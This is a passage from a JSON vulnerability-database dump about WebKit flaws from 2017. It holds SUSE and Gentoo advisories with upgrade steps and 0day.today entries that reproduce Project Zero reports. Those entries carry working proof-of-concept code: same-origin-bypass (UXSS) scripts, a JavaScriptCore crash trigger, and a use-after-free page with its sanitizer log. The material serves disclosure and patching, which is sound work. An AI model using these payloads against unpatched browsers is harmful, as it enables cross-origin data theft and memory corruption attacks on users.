on s390/s390x on SLE15/Tumbleweed.\n\n", "edition": 1, "modified": "2018-01-25T21:10:00", "published": "2018-01-25T21:10:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00056.html", "id": "SUSE-SU-2018:0219-1", "type": "suse", "title": "Security update for webkit2gtk3 (important)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2017-10-15T08:23:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7042", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7039", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7030", "CVE-2017-7041"], "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, offers Webkit\u2019s full functionality and is used on a wide range of systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebkitGTK+. Please review the references below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code, cause a Denial of Service condition, bypass intended memory-read restrictions, conduct a timing side-channel attack to bypass the Same Origin Policy, obtain sensitive information, or spoof the address bar. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebKitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.16.6\"\n \n\nPackages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying some of these packages.", "edition": 1, "modified": "2017-10-13T00:00:00", "published": "2017-10-13T00:00:00", "href": "https://security.gentoo.org/glsa/201710-14", "id": "GLSA-201710-14", "title": "WebKitGTK+: Multiple Vulnerabilities", "type": "gentoo", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-17T20:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2538", "CVE-2017-2424"], "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, offers Webkit\u2019s full functionality and is used on a wide range of systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebkitGTK+. Please review the references below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code via crafted web content.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebkitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.16.5\"\n \n\nPackages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying some of these packages.", "edition": 1, "modified": "2017-09-17T00:00:00", "published": "2017-09-17T00:00:00", "href": "https://security.gentoo.org/glsa/201709-03", "id": "GLSA-201709-03", "title": "WebKitGTK+: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-19T05:16:24", "description": "WebKit JSC JSObject::putInlineSlow and JSValue::putToPrimitive suffer from a universal cross site scripting vulnerability.", "edition": 1, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7037"], "modified": "2017-07-25T00:00:00", "href": "https://0day.today/exploit/description/28186", "id": "1337DAY-ID-28186", "sourceData": "WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive \r\n\r\nCVE-2017-7037\r\n\r\n\r\nJSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called.\r\n\r\nThe PoC shows to call a setter of another origin's object.\r\n\r\nPoC 1 - JSValue::putToPrimitive:\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = 1.2;\r\n a.__proto__.__proto__ = f.contentWindow;\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n\r\n</script>\r\n</body>\r\n\r\n\r\nPoC 2 - JSObject::putInlineSlow:\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = {\r\n __proto__: f.contentWindow\r\n };\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n</script>\r\n</body>\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/28186", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-20T01:22:52", "description": "WebKit suffers from a JSC incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).", "edition": 1, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC Incorrect Scope Register Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7018"], "modified": "2017-07-25T00:00:00", "href": "https://0day.today/exploit/description/28184", "id": "1337DAY-ID-28184", "sourceData": "WebKit: JSC: Incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry) \r\n\r\nCVE-2017-7018\r\n\r\n\r\nHere's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).\r\n\r\nvoid flush(InlineStackEntry* inlineStackEntry)\r\n{\r\n ...\r\n if (m_graph.needsScopeRegister())\r\n flush(m_codeBlock->scopeRegister()); <<--- (a)\r\n}\r\n\r\nAt (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.\r\n\r\nPoC:\r\nfunction f() {\r\n (function () {\r\n eval('1');\r\n f();\r\n }());\r\n\r\n throw 1;\r\n}\r\n\r\nf();\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/28184", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-14T14:36:37", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2017-07-24T00:00:00", "title": "WebKit - WebCore::RenderObject with Accessibility Enabled Use-After-Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7046"], "modified": "2017-07-24T00:00:00", "href": "https://0day.today/exploit/description/28176", "id": "1337DAY-ID-28176", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1246\r\n \r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n \r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<style>\r\n#link { text-transform: lowercase; }\r\nlink::first-letter { border-spacing: 1em; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n dt.appendChild(link);\r\n var s = link.style;\r\n s.setProperty(\"display\", \"table-column-group\");\r\n s.setProperty(\"-webkit-appearance\", \"menulist-button\");\r\n}\r\nfunction eventhandler() {\r\n dir.setAttribute(\"aria-labeledby\", \"meta\");\r\n link.appendChild(table.rows[0]);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<link id=\"link\">\r\n<meta id=\"meta\">\r\n<dir id=\"dir\">\r\n<table id=\"table\">\r\n<th>1</th>\r\n<dt id=\"dt\">\r\n<iframe onload=\"eventhandler()\"></iframe>\r\n \r\n<!--\r\n=================================================================\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58\r\nREAD of size 4 at 0x608000090ac8 thread T0\r\n==30692==WARNING: invalid path to external symbolizer!\r\n==30692==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25)\r\n #1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe)\r\n #2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec)\r\n #3 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #10 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #30 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #33 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n \r\n0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00)\r\nfreed by thread T0 here:\r\n #0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874)\r\n #3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a)\r\n #4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761)\r\n #5 0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f)\r\n #6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957)\r\n #7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #24 0x10ab8536d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d)\r\n #25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)\r\n #26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)\r\n #27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0)\r\n #28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21)\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11629b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)\r\n #7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d)\r\n #8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae)\r\n #9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4)\r\n #10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #12 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #14 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #23 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) 